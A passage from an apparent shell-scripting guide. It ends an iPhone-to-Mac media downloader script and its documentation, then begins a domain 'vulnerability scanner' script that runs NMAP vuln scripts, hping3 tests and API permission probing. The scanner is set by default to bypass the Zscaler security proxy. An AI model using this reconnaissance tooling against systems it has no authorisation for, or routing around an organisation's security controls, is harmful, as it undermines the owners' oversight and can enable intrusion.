    -r                  Resume incomplete downloads (default: true)
    -n                  Skip checksum verification (faster, less safe)
    -h                  Show this help message

EXAMPLES:
    # Download all photos and videos to current directory
    $0

    # Download only JPG files to ~/Pictures/iPhone
    $0 -p "*.jpg" -o ~/Pictures/iPhone

    # Download all media organized by date
    $0 -d -o ~/Pictures/iPhone

    # Download videos from specific date range
    $0 -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/iPhone

    # Download specific IMG files organized by date
    $0 -p "IMG_*.{jpg,heic}" -d -o ~/Photos
INNER_EOF
    exit 1
}

# Parse command line arguments
while getopts "p:o:ds:e:rnh" opt; do
    case $opt in
        p) PATTERN="$OPTARG" ;;
        o) OUTPUT_DIR="$OPTARG" ;;
        d) ORGANIZE_BY_DATE=true ;;
        s) START_DATE="$OPTARG" ;;
        e) END_DATE="$OPTARG" ;;
        r) ;; # Resume is default, keeping for backward compatibility
        n) VERIFY_CHECKSUM=false ;;
        h) usage ;;
        *) usage ;;
    esac
done

# Create output directory if it doesn't exist
mkdir -p "$OUTPUT_DIR"
OUTPUT_DIR=$(cd "$OUTPUT_DIR" && pwd)

# Set up state directory for tracking downloads
STATE_DIR="$OUTPUT_DIR/.iphone_download_state"
mkdir -p "$STATE_DIR"

# Create mount point
mkdir -p "$MOUNT_POINT"

echo "=== iPhone Media Downloader ==="
echo "Pattern: $PATTERN"
echo "Output: $OUTPUT_DIR"
echo "Organize by date: $ORGANIZE_BY_DATE"
[ -n "$START_DATE" ] && echo "Start date: $START_DATE"
[ -n "$END_DATE" ] && echo "End date: $END_DATE"
echo ""

# Check if iPhone is connected
echo "Checking for iPhone connection..."
if ! ideviceinfo -s > /dev/null 2>&1; then
    echo "Error: No iPhone detected. Please connect your iPhone and trust this computer."
    exit 1
fi

# Mount iPhone
echo "Mounting iPhone..."
if ! ifuse "$MOUNT_POINT" 2>/dev/null; then
    echo "Error: Failed to mount iPhone. Make sure you've trusted this computer on your iPhone."
    exit 1
fi

# Cleanup function
cleanup() {
    local exit_code=$?
    echo ""
    if [ $exit_code -ne 0 ]; then
        echo "⚠ Download interrupted. Run the script again to resume."
    fi
    echo "Unmounting iPhone..."
    umount "$MOUNT_POINT" 2>/dev/null || true
    rmdir "$MOUNT_POINT" 2>/dev/null || true
}
trap cleanup EXIT

# Find DCIM folder
DCIM_PATH="$MOUNT_POINT/DCIM"
if [ ! -d "$DCIM_PATH" ]; then
    echo "Error: DCIM folder not found on iPhone"
    exit 1
fi

echo "Scanning for files matching pattern: $PATTERN"
echo ""

# Counter
TOTAL_FILES=0
COPIED_FILES=0
SKIPPED_FILES=0
RESUMED_FILES=0
FAILED_FILES=0

# Function to compute file checksum
compute_checksum() {
    local file="$1"
    if [ -f "$file" ]; then
        shasum -a 256 "$file" 2>/dev/null | awk '{print $1}'
    fi
}

# Function to get file size
get_file_size() {
    local file="$1"
    if [ -f "$file" ]; then
        stat -f "%z" "$file" 2>/dev/null
    fi
}

# Function to mark file as completed
mark_completed() {
    local source_file="$1"
    local dest_file="$2"
    local checksum="$3"
    local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
    
    echo "$dest_file|$checksum|$(date +%s)" > "$state_file"
}

# Function to check if file was previously completed
is_completed() {
    local source_file="$1"
    local dest_file="$2"
    local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
    
    if [ ! -f "$state_file" ]; then
        return 1
    fi
    
    # Read state file
    local saved_dest saved_checksum saved_timestamp
    IFS='|' read -r saved_dest saved_checksum saved_timestamp < "$state_file"
    
    # Check if destination file exists and matches
    if [ "$saved_dest" = "$dest_file" ] && [ -f "$dest_file" ]; then
        if [ "$VERIFY_CHECKSUM" = true ]; then
            local current_checksum=$(compute_checksum "$dest_file")
            if [ "$current_checksum" = "$saved_checksum" ]; then
                return 0
            fi
        else
            # Without checksum verification, just check file exists
            return 0
        fi
    fi
    
    return 1
}

# Convert dates to timestamps for comparison
START_TIMESTAMP=""
END_TIMESTAMP=""
if [ -n "$START_DATE" ]; then
    START_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$START_DATE" "+%s" 2>/dev/null || echo "")
    if [ -z "$START_TIMESTAMP" ]; then
        echo "Error: Invalid start date format. Use YYYY-MM-DD"
        exit 1
    fi
fi
if [ -n "$END_DATE" ]; then
    END_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$END_DATE" "+%s" 2>/dev/null || echo "")
    if [ -z "$END_TIMESTAMP" ]; then
        echo "Error: Invalid end date format. Use YYYY-MM-DD"
        exit 1
    fi
    # Add 24 hours to include the entire end date
    END_TIMESTAMP=$((END_TIMESTAMP + 86400))
fi

# Process files
# Use process substitution (not a pipeline) so counter updates made inside
# the loop survive into the summary below; a pipeline would run the loop in
# a subshell and discard them.
while IFS= read -r file; do
    filename=$(basename "$file")
    
    # Check if filename matches pattern (glob matching; RHS intentionally unquoted)
    if [[ ! "$filename" == $PATTERN ]]; then
        continue
    fi
    
    TOTAL_FILES=$((TOTAL_FILES + 1))
    
    # Get file creation date
    if command -v exiftool > /dev/null 2>&1; then
        # Try to get date from EXIF data
        CREATE_DATE=$(exiftool -s3 -DateTimeOriginal -d "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
        if [ -z "$CREATE_DATE" ]; then
            # Fallback to file modification time
            CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
        fi
    else
        # Use file modification time
        CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
    fi
    
    # Extract date components
    if [ -n "$CREATE_DATE" ]; then
        FILE_DATE=$(echo "$CREATE_DATE" | cut -d' ' -f1)
        FILE_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$FILE_DATE" "+%s" 2>/dev/null || echo "")
        
        # Check date filters
        if [ -n "$START_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -lt "$START_TIMESTAMP" ]; then
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        fi
        if [ -n "$END_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -ge "$END_TIMESTAMP" ]; then
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        fi
        
        # Determine output path with YYYY/MMM structure
        if [ "$ORGANIZE_BY_DATE" = true ]; then
            YEAR=$(echo "$FILE_DATE" | cut -d'-' -f1)
            MONTH_NUM=$(echo "$FILE_DATE" | cut -d'-' -f2)
            # Convert month number to 3-letter abbreviation
            case "$MONTH_NUM" in
                01) MONTH="Jan" ;;
                02) MONTH="Feb" ;;
                03) MONTH="Mar" ;;
                04) MONTH="Apr" ;;
                05) MONTH="May" ;;
                06) MONTH="Jun" ;;
                07) MONTH="Jul" ;;
                08) MONTH="Aug" ;;
                09) MONTH="Sep" ;;
                10) MONTH="Oct" ;;
                11) MONTH="Nov" ;;
                12) MONTH="Dec" ;;
                *) MONTH="Unknown" ;;
            esac
            DEST_DIR="$OUTPUT_DIR/$YEAR/$MONTH"
        else
            DEST_DIR="$OUTPUT_DIR"
        fi
    else
        DEST_DIR="$OUTPUT_DIR"
    fi
    
    # Create destination directory
    mkdir -p "$DEST_DIR"
    
    # Determine destination path
    DEST_PATH="$DEST_DIR/$filename"
    
    # Check if this file was previously completed successfully
    if is_completed "$file" "$DEST_PATH"; then
        echo "✓ Already downloaded: $filename"
        SKIPPED_FILES=$((SKIPPED_FILES + 1))
        continue
    fi
    
    # Check if file already exists with same content (for backward compatibility)
    if [ -f "$DEST_PATH" ]; then
        if cmp -s "$file" "$DEST_PATH"; then
            echo "✓ Already exists (identical): $filename"
            # Mark as completed for future runs
            SOURCE_CHECKSUM=$(compute_checksum "$DEST_PATH")
            mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        else
            # Add timestamp suffix to avoid overwriting a different file
            BASE="${filename%.*}"
            EXT="${filename##*.}"
            DEST_PATH="$DEST_DIR/${BASE}_$(date +%s).$EXT"
        fi
    fi
    
    # Use temporary file for atomic copy
    TEMP_PATH="${DEST_PATH}.tmp.$$"
    
    # Copy to temporary file
    echo "⬇ Downloading: $filename → $DEST_PATH"
    if ! cp "$file" "$TEMP_PATH" 2>/dev/null; then
        echo "✗ Failed to copy: $filename"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
        continue
    fi
    
    # Verify size matches (basic corruption check)
    SOURCE_SIZE=$(get_file_size "$file")
    TEMP_SIZE=$(get_file_size "$TEMP_PATH")
    
    if [ "$SOURCE_SIZE" != "$TEMP_SIZE" ]; then
        echo "✗ Size mismatch for $filename (source: $SOURCE_SIZE, copied: $TEMP_SIZE)"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
        continue
    fi
    
    # Compute checksum for verification and tracking
    if [ "$VERIFY_CHECKSUM" = true ]; then
        SOURCE_CHECKSUM=$(compute_checksum "$TEMP_PATH")
    else
        SOURCE_CHECKSUM="skipped"
    fi
    
    # Preserve timestamps
    if [ -n "$CREATE_DATE" ]; then
        TOUCH_TS=$(date -j -f "%Y-%m-%d %H:%M:%S" "$CREATE_DATE" "+%Y%m%d%H%M.%S" 2>/dev/null)
        [ -n "$TOUCH_TS" ] && touch -t "$TOUCH_TS" "$TEMP_PATH" 2>/dev/null || true
    fi
    
    # Atomic move from temp to final destination
    if mv "$TEMP_PATH" "$DEST_PATH" 2>/dev/null; then
        echo "✓ Completed: $filename"
        # Mark as successfully completed
        mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
        COPIED_FILES=$((COPIED_FILES + 1))
    else
        echo "✗ Failed to finalize: $filename"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
    fi
done < <(find "$DCIM_PATH" -type f)

echo ""
echo "=== Summary ==="
echo "Total files matching pattern: $TOTAL_FILES"
echo "Files downloaded: $COPIED_FILES"
echo "Files skipped (already present or outside date range): $SKIPPED_FILES"
if [ $FAILED_FILES -gt 0 ]; then
    echo "Files failed: $FAILED_FILES"
    echo ""
    echo "⚠ Some files failed to download. Run the script again to retry."
    exit 1
fi
echo ""
echo "✓ Download complete! All files transferred successfully."
OUTER_EOF

echo "Making the script executable..."
chmod +x download-iphone-media.sh

echo "✓ Script created successfully: download-iphone-media.sh"

Usage Examples

Basic Usage

Download all photos and videos to the current directory:

./download-iphone-media.sh

Download with Date Organization

Organize files into folders by creation date (YYYY/MMM structure):

./download-iphone-media.sh -d -o ./Pictures

This creates a structure like:

./Pictures
├── 2024/
│   ├── Jan/
│   │   ├── IMG_1234.jpg
│   │   └── IMG_1235.heic
│   ├── Feb/
│   └── Dec/
└── 2025/
    ├── Jan/
    └── Nov/

Filter by File Pattern

Download only specific file types:

# Only JPG files
./download-iphone-media.sh -p "*.jpg" -o ~/Pictures/iPhone

# Only videos (MOV and MP4)
./download-iphone-media.sh -p "*.mov" -o ~/Videos/iPhone
./download-iphone-media.sh -p "*.mp4" -o ~/Videos/iPhone

# Files starting with IMG_
./download-iphone-media.sh -p "IMG_*" -o ~/Pictures

# HEIC photos (iPhone's default format)
./download-iphone-media.sh -p "*.heic" -o ~/Pictures/iPhone

Filter by Date Range

Download photos from a specific date range:

# Photos from January 2025
./download-iphone-media.sh -s 2025-01-01 -e 2025-01-31 -d -o ~/Pictures/January2025

# Photos from last week
./download-iphone-media.sh -s 2025-11-10 -e 2025-11-17 -o ~/Pictures/LastWeek

# Photos after a specific date
./download-iphone-media.sh -s 2025-11-01 -o ~/Pictures/Recent

Combined Filters

Combine multiple options for precise control:

# Download only videos from January 2025, organized by date
./download-iphone-media.sh -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/Vacation

# Download all HEIC photos from the last month, organized by date
./download-iphone-media.sh -p "*.heic" -s 2025-10-17 -e 2025-11-17 -d -o ~/Pictures/LastMonth

Features

Resumable & Idempotent Downloads

  • Crash recovery: Interrupted downloads can be resumed by running the script again
  • Atomic operations: Files are copied to temporary locations first, then moved atomically
  • State tracking: Maintains a hidden state directory (.iphone_download_state) to track completed files
  • Checksum verification: Uses SHA-256 checksums to verify file integrity (can be disabled with -n for speed)
  • No duplicates: Running the script multiple times won’t re-download existing files
  • Corruption detection: Validates file sizes and optionally checksums after copy

Date-Based Organization

  • Automatic folder structure: Creates YYYY/MMM folders based on photo creation date (e.g., 2025/Jan, 2025/Feb)
  • EXIF data support: Reads actual photo capture date from EXIF metadata when available
  • Fallback mechanism: Uses file modification time if EXIF data is unavailable
  • Fewer folders: Maximum 12 month folders per year instead of up to 365 day folders
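The YYYY/MMM mapping can be sketched as a standalone snippet (FILE_DATE here is a made-up example; the case statement mirrors the one in the script):

```shell
# Map a file date (YYYY-MM-DD) to the YYYY/MMM folder the script creates
FILE_DATE="2025-03-14"
YEAR=${FILE_DATE%%-*}                            # "2025"
MONTH_NUM=$(echo "$FILE_DATE" | cut -d'-' -f2)   # "03"
case "$MONTH_NUM" in
    01) MONTH="Jan" ;; 02) MONTH="Feb" ;; 03) MONTH="Mar" ;;
    04) MONTH="Apr" ;; 05) MONTH="May" ;; 06) MONTH="Jun" ;;
    07) MONTH="Jul" ;; 08) MONTH="Aug" ;; 09) MONTH="Sep" ;;
    10) MONTH="Oct" ;; 11) MONTH="Nov" ;; 12) MONTH="Dec" ;;
    *)  MONTH="Unknown" ;;
esac
DEST_DIR="Pictures/$YEAR/$MONTH"
echo "$DEST_DIR"                                 # Pictures/2025/Mar
```

A photo taken on 14 March 2025 therefore lands in Pictures/2025/Mar regardless of which day of the month it was shot.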

Smart File Handling

  • Duplicate detection: Skips files that already exist with identical content
  • Conflict resolution: Adds timestamp suffix to filename if different file with same name exists
  • Timestamp preservation: Maintains original creation dates on copied files
  • Error tracking: Reports failed files and provides clear exit codes

Progress Feedback

  • Real-time progress updates showing each file being downloaded
  • Summary statistics at the end (total found, downloaded, skipped, failed)
  • Clear error messages for troubleshooting
  • Helpful resume instructions if interrupted

Common File Patterns

iPhone typically uses these file formats:

Type          Extensions       Pattern Example
Photos        .jpg, .heic      *.jpg or *.heic
Videos        .mov, .mp4       *.mov or *.mp4
Screenshots   .png             *.png
Live Photos   .heic + .mov     IMG_*.heic + IMG_*.mov
All media     all of the above * (default)
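The -p patterns are plain shell globs. A minimal, POSIX-portable sketch of the matching logic (the script itself uses bash's pattern comparison, which behaves the same way for these globs):

```shell
# Glob matching as used for the -p option: the pattern is expanded
# unquoted so it is treated as a glob, not a literal string
matches() {
    case "$1" in
        $2) return 0 ;;
        *)  return 1 ;;
    esac
}

matches "IMG_0001.jpg"  "*.jpg" && echo "matched"
matches "IMG_0001.png"  "*.jpg" || echo "filtered out"
```

Note that brace lists such as *.{jpg,heic} are not glob syntax, so they never match here; run the script once per extension instead.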

5. Handling Interrupted Downloads

If a download is interrupted (disconnection, error, etc.), simply run the script again:

# Script was interrupted - just run it again
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script will:

  • Skip all successfully downloaded files
  • Retry any failed files
  • Continue from where it left off

6. Fast Mode (Skip Checksum Verification)

For faster transfers on reliable connections, disable checksum verification:

# Skip checksums for speed (still verifies file sizes)
./download-iphone-media.sh -n -d -o ~/Pictures/iPhone

Note: This is generally safe but won’t detect corruption as thoroughly.

7. Clean State and Re-download

If you want to force a re-download of all files:

# Remove state directory to start fresh
rm -rf ~/Pictures/iPhone/.iphone_download_state
./download-iphone-media.sh -d -o ~/Pictures/iPhone

Troubleshooting

iPhone Not Detected

Error: No iPhone detected. Please connect your iPhone and trust this computer.

Solution:

  1. Make sure your iPhone is connected via USB cable
  2. Unlock your iPhone
  3. Tap “Trust” when prompted on your iPhone
  4. Run idevicepair pair if you haven’t already

Failed to Mount iPhone

Error: Failed to mount iPhone

Solution:

  1. Try unplugging and reconnecting your iPhone
  2. Check if another process is using the iPhone, then clear any stale mount:
     umount /tmp/iphone_mount 2>/dev/null
  3. Restart your iPhone and try again
  4. On macOS Ventura or later, check System Settings → Privacy & Security → Files and Folders

Permission Denied

Solution:
Make sure the script has executable permissions:

chmod +x download-iphone-media.sh

Missing Tools

Error: Commands not found

Solution:
Install the required tools:

brew install libimobiledevice ifuse exiftool

On newer macOS versions, you may need to install macFUSE:

brew install --cask macfuse

After installation, you may need to restart your Mac and allow the kernel extension in System Settings → Privacy & Security.

Tips and Best Practices

1. Regular Backups

Create a scheduled backup script:

#!/bin/bash
# Save as ~/bin/backup-iphone-photos.sh

DATE=$(date +%Y-%m-%d)
BACKUP_DIR=~/Pictures/iPhone-Backups/$DATE

./download-iphone-media.sh -d -o "$BACKUP_DIR"

echo "Backup completed to $BACKUP_DIR"

2. Incremental Downloads

The script is fully idempotent and tracks completed downloads, making it perfect for incremental backups:

# Run daily to get new photos - only new files will be downloaded
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script maintains state in .iphone_download_state/ within your output directory, ensuring:

  • Already downloaded files are skipped instantly (no re-copying)
  • Interrupted downloads can be resumed
  • File integrity is verified with checksums
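A sketch of the state-record round trip, assuming the pipe-delimited dest|checksum|timestamp layout described later in this guide (the path, checksum, and timestamp are made-up examples):

```shell
# Write a completion record, then read it back field by field
STATE_FILE=$(mktemp)
DEST="/Users/me/Pictures/iPhone/2025/Jan/IMG_0001.heic"
CHECKSUM="abc123"
echo "$DEST|$CHECKSUM|1736900000" > "$STATE_FILE"

# IFS='|' splits the single line back into its three fields
IFS='|' read -r saved_dest saved_checksum saved_ts < "$STATE_FILE"
echo "$saved_dest"    # the destination path round-trips intact
rm -f "$STATE_FILE"
```

On each run, a file is skipped when its record exists and the destination still matches the saved checksum.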

3. Free Up iPhone Storage

After confirming successful download:

  1. Verify files are on your MacBook
  2. Check file counts match
  3. Delete photos from iPhone via Photos app
  4. Empty “Recently Deleted” album

4. Convert HEIC to JPG (Optional)

If you need JPG files for compatibility:

# Install ImageMagick
brew install imagemagick

# Convert all HEIC files to JPG
find ~/Pictures/iPhone -name "*.heic" -exec sh -c 'magick "$1" "${1%.heic}.jpg"' _ {} \;

How Idempotent Recovery Works

The script implements several mechanisms to ensure safe, resumable downloads:

1. State Tracking

A hidden directory .iphone_download_state/ is created in your output directory. For each successfully downloaded file, a state file is created containing:

  • Destination file path
  • SHA-256 checksum (if verification enabled)
  • Completion timestamp

2. Atomic Operations

Each file is downloaded using a two-phase commit:

  1. Download Phase: Copy to temporary file (.tmp.$$ suffix)
  2. Verification Phase: Check file size and optionally compute checksum
  3. Commit Phase: Atomically move temp file to final destination
  4. Record Phase: Write completion state

If the script is interrupted at any point, incomplete temporary files are cleaned up automatically.
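The download/verify/commit sequence can be sketched in isolation (file contents and temp paths here are illustrative):

```shell
# Two-phase commit: copy to a .tmp file, verify, then rename atomically
SRC=$(mktemp); printf 'hello' > "$SRC"
DEST=$(mktemp -d)/IMG_0001.jpg
TMP="${DEST}.tmp.$$"

cp "$SRC" "$TMP"
# Verify: byte counts must match before the copy is committed
[ "$(wc -c < "$SRC")" -eq "$(wc -c < "$TMP")" ] || { rm -f "$TMP"; exit 1; }
mv "$TMP" "$DEST"    # rename is atomic on the same filesystem

cat "$DEST"          # hello
```

Because the final name only ever appears via mv, a reader never sees a half-written file; an interrupted run leaves only a .tmp file, which is cleaned up.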

3. Idempotent Behavior

When you run the script:

  1. Before downloading each file, it checks the state directory
  2. If a state file exists, it verifies the destination file still exists and matches the checksum
  3. If verification passes, the file is skipped (no re-download)
  4. If verification fails or no state exists, the file is downloaded

This means:

  • ✓ Safe to run multiple times
  • ✓ Interrupted downloads can be resumed
  • ✓ Corrupted files are detected and re-downloaded
  • ✓ No wasted bandwidth on already-downloaded files

4. Checksum Verification

By default, SHA-256 checksums are computed and verified:

  • During download: Checksum computed after copy completes
  • On resume: Existing files are verified against stored checksum
  • Optional: Use -n flag to skip checksums for speed (still verifies file sizes)
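A hedged sketch of the checksum step: the script calls shasum -a 256 (bundled with macOS); the sha256sum fallback below is only for portability to Linux and is not part of the script itself:

```shell
# SHA-256 of a file, trying the macOS tool first, then the Linux one
sha256_of() {
    { shasum -a 256 "$1" 2>/dev/null || sha256sum "$1"; } | awk '{print $1}'
}

F=$(mktemp); printf 'hello' > "$F"
SUM=$(sha256_of "$F")
echo "$SUM"   # 2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824
```

On resume, recomputing this digest and comparing it to the stored value is what distinguishes an intact download from a corrupted one.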

Example Recovery Scenario

# Start downloading 1000 photos
./download-iphone-media.sh -d -o ~/Pictures/iPhone

# Script is interrupted after 500 files
# Press Ctrl+C or cable disconnects

# Simply run again - picks up where it left off
./download-iphone-media.sh -d -o ~/Pictures/iPhone
# Output:
# ✓ Already downloaded: IMG_0001.heic
# ✓ Already downloaded: IMG_0002.heic
# ...
# ⬇ Downloading: IMG_0501.heic → ~/Pictures/iPhone/2025/Jan/IMG_0501.heic

Performance Notes

  • Transfer speed: Depends on USB connection (USB 2.0 vs USB 3.0)
  • Large libraries: May take significant time for thousands of photos
  • EXIF reading: Adds minimal overhead but provides accurate dates
  • Pattern matching: Applied on the Mac after listing files, so the entire DCIM tree is scanned on every run

Conclusion

This script provides a robust, production-ready solution for downloading photos and videos from your iPhone to your MacBook. Key capabilities:

Core Features:

  • Filter by file patterns (type, name)
  • Filter by date ranges
  • Organize automatically into date-based folders
  • Preserve original file metadata

Reliability:

  • Fully idempotent – safe to run multiple times
  • Resumable downloads with automatic crash recovery
  • Atomic file operations prevent corruption
  • Checksum verification ensures data integrity
  • Clear error reporting and recovery instructions

For regular use, consider creating aliases in your ~/.zshrc:

# Add to ~/.zshrc
alias iphone-backup='~/download-iphone-media.sh -d -o ~/Pictures/iPhone'
alias iphone-videos='~/download-iphone-media.sh -p "*.mov" -d -o ~/Videos/iPhone'

Then simply run iphone-backup whenever you want to download your photos!

Resources

MacBook: Enhanced Domain Vulnerability Scanner

Below is a fairly comprehensive non-intrusive security assessment script with vulnerability scanning, API testing, and detailed reporting.

Features

  • DNS & SSL/TLS Analysis – Complete DNS enumeration, certificate inspection, cipher analysis
  • Port & Vulnerability Scanning – Service detection, NMAP vuln scripts, outdated software detection
  • Subdomain Discovery – Certificate transparency log mining
  • API Security Testing – Endpoint discovery, permission testing, CORS analysis
  • Asset Discovery – Web technology detection, CMS identification
  • Firewall Testing – hping3 TCP/ICMP tests (if available)
  • Network Bypass – Uses en0 interface to bypass Zscaler
  • Debug Mode – Comprehensive logging enabled by default

Installation

Required Dependencies

# macOS
brew install nmap openssl bind curl jq

# Linux
sudo apt-get install nmap openssl dnsutils curl jq

Optional Dependencies

# macOS
brew install hping

# Linux
sudo apt-get install hping3 nikto

Usage

Basic Syntax

./security_scanner_enhanced.sh -d DOMAIN [OPTIONS]

Options

  • -d DOMAIN – Target domain (required)
  • -s – Enable subdomain scanning
  • -m NUM – Max subdomains to scan (default: 10)
  • -v – Enable vulnerability scanning
  • -a – Enable API discovery and testing
  • -h – Show help

Examples:

# Basic scan
./security_scanner_enhanced.sh -d example.com

# Full scan with all features
./security_scanner_enhanced.sh -d example.com -s -m 20 -v -a

# Vulnerability assessment only
./security_scanner_enhanced.sh -d example.com -v

# API security testing
./security_scanner_enhanced.sh -d example.com -a

Network Configuration

Default Interface: en0 (bypasses Zscaler)

To change the interface, edit line 24:

NETWORK_INTERFACE="en0"  # Change to your interface

The script automatically falls back to default routing if the interface is unavailable.

Debug Mode

Debug mode is enabled by default and shows:

  • Dependency checks
  • Network interface status
  • Command execution details
  • Scan progress
  • File operations

Debug messages appear in cyan with [DEBUG] prefix.
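A minimal sketch of the gating pattern behind that flag (the function and variable names mirror the script's):

```shell
# Debug messages are emitted only when DEBUG=true
CYAN='\033[0;36m'; NC='\033[0m'
DEBUG=true

log_debug() {
    if [ "$DEBUG" = true ]; then
        printf '%b[DEBUG]%b %s\n' "$CYAN" "$NC" "$1"
    fi
}

log_debug "dependency check started"   # printed in cyan
DEBUG=false
log_debug "this line is suppressed"    # no output
```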

To disable, edit line 27:

DEBUG=false

Output

Each scan creates a timestamped directory: scan_example.com_20251016_191806/

Key Files

  • executive_summary.md – High-level findings
  • technical_report.md – Detailed technical analysis
  • vulnerability_report.md – Vulnerability assessment (if -v used)
  • api_security_report.md – API security findings (if -a used)
  • dns_*.txt – DNS records
  • ssl_*.txt – SSL/TLS analysis
  • port_scan_*.txt – Port scan results
  • subdomains_discovered.txt – Found subdomains (if -s used)

Scan Duration

Scan Type              Duration
Basic                  2-5 min
With subdomains        +1-2 min per subdomain
With vulnerabilities   +10-20 min
Full scan              15-30 min

Troubleshooting

Missing dependencies

# Install required tools
brew install nmap openssl bind curl jq  # macOS
sudo apt-get install nmap openssl dnsutils curl jq  # Linux

Interface not found

# Check available interfaces
ifconfig

# Script will automatically fall back to default routing

Permission errors

# Some scans may require elevated privileges
sudo ./security_scanner_enhanced.sh -d example.com

Configuration

Change scan ports (line 325)

# Default: top 1000 ports
--top-ports 1000

# Custom ports
-p 80,443,8080,8443

# All ports (slow)
-p-

Adjust subdomain limit (line 1162)

MAX_SUBDOMAINS=10  # Change as needed

Add custom API paths (line 567)

API_PATHS=(
    "/api"
    "/api/v1"
    "/custom/endpoint"  # Add yours
)

⚠️ WARNING: Only scan domains you own or have explicit permission to test. Unauthorized scanning may be illegal.

This tool performs non-intrusive reconnaissance and assessment only:

  • ✅ DNS queries, certificate transparency logs, port/service scans, public web requests
  • ❌ No exploitation, brute force, or denial of service

Best Practices

  1. Obtain proper authorization before scanning
  2. Monitor progress via debug output
  3. Review all generated reports
  4. Prioritize findings by risk
  5. Schedule follow-up scans after remediation

Disclaimer: This tool is for authorized security testing only. The authors assume no liability for misuse or damage.

The Script:

cat > ./security_scanner_enhanced.sh << 'EOF'
#!/bin/zsh

################################################################################
# Enhanced Security Scanner Script v2.0
# Comprehensive security assessment with vulnerability scanning
# Includes: NMAP vuln scripts, hping3, asset discovery, API testing
# Network Interface: en0 (bypasses Zscaler)
# Debug Mode: Enabled
################################################################################

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Script version
VERSION="2.0.1"

# Network interface to use (bypasses Zscaler)
NETWORK_INTERFACE="en0"

# Debug mode flag
DEBUG=true

################################################################################
# Usage Information
################################################################################
usage() {
    # Inner heredoc uses USAGE_EOF so it doesn't terminate the outer 'EOF'
    # heredoc that wraps this whole script
    cat << USAGE_EOF
Enhanced Security Scanner v${VERSION}

Usage: $0 -d DOMAIN [-s] [-m MAX_SUBDOMAINS] [-v] [-a]

Options:
    -d DOMAIN           Target domain to scan (required)
    -s                  Scan subdomains (optional)
    -m MAX_SUBDOMAINS   Maximum number of subdomains to scan (default: 10)
    -v                  Enable vulnerability scanning (NMAP vuln scripts)
    -a                  Enable API discovery and testing
    -h                  Show this help message

Network Configuration:
    Interface: $NETWORK_INTERFACE (bypasses Zscaler)
    Debug Mode: Enabled

Examples:
    $0 -d example.com
    $0 -d example.com -s -m 20 -v
    $0 -d example.com -s -v -a

USAGE_EOF
    exit 1
}

################################################################################
# Logging Functions
################################################################################
log_info() {
    echo -e "${BLUE}[INFO]${NC} $1"
}

log_success() {
    echo -e "${GREEN}[SUCCESS]${NC} $1"
}

log_warning() {
    echo -e "${YELLOW}[WARNING]${NC} $1"
}

log_error() {
    echo -e "${RED}[ERROR]${NC} $1"
}

log_vuln() {
    echo -e "${MAGENTA}[VULN]${NC} $1"
}

log_debug() {
    if [ "$DEBUG" = true ]; then
        echo -e "${CYAN}[DEBUG]${NC} $1"
    fi
}

################################################################################
# Check Dependencies
################################################################################
check_dependencies() {
    log_info "Checking dependencies..."
    log_debug "Starting dependency check"
    
    local missing_deps=()
    local optional_deps=()
    
    # Required dependencies
    log_debug "Checking for nmap..."
    command -v nmap >/dev/null 2>&1 || missing_deps+=("nmap")
    log_debug "Checking for openssl..."
    command -v openssl >/dev/null 2>&1 || missing_deps+=("openssl")
    log_debug "Checking for dig..."
    command -v dig >/dev/null 2>&1 || missing_deps+=("dig")
    log_debug "Checking for curl..."
    command -v curl >/dev/null 2>&1 || missing_deps+=("curl")
    log_debug "Checking for jq..."
    command -v jq >/dev/null 2>&1 || missing_deps+=("jq")
    
    # Optional dependencies
    log_debug "Checking for hping3..."
    command -v hping3 >/dev/null 2>&1 || optional_deps+=("hping3")
    log_debug "Checking for nikto..."
    command -v nikto >/dev/null 2>&1 || optional_deps+=("nikto")
    
    if [ ${#missing_deps[@]} -ne 0 ]; then
        log_error "Missing required dependencies: ${missing_deps[*]}"
        log_info "Install missing dependencies and try again"
        exit 1
    fi
    
    if [ ${#optional_deps[@]} -ne 0 ]; then
        log_warning "Missing optional dependencies: ${optional_deps[*]}"
        log_info "Some features may be limited"
    fi
    
    # Check network interface
    log_debug "Checking network interface: $NETWORK_INTERFACE"
    if ifconfig "$NETWORK_INTERFACE" >/dev/null 2>&1; then
        log_success "Network interface $NETWORK_INTERFACE is available"
        local interface_ip=$(ifconfig "$NETWORK_INTERFACE" | grep 'inet ' | awk '{print $2}')
        log_debug "Interface IP: $interface_ip"
    else
        log_warning "Network interface $NETWORK_INTERFACE not found, using default routing"
        NETWORK_INTERFACE=""
    fi
    
    log_success "All required dependencies found"
}

################################################################################
# Initialize Scan
################################################################################
initialize_scan() {
    log_debug "Initializing scan for domain: $DOMAIN"
    SCAN_DATE=$(date +"%Y-%m-%d %H:%M:%S")
    SCAN_DIR="scan_${DOMAIN}_$(date +%Y%m%d_%H%M%S)"
    
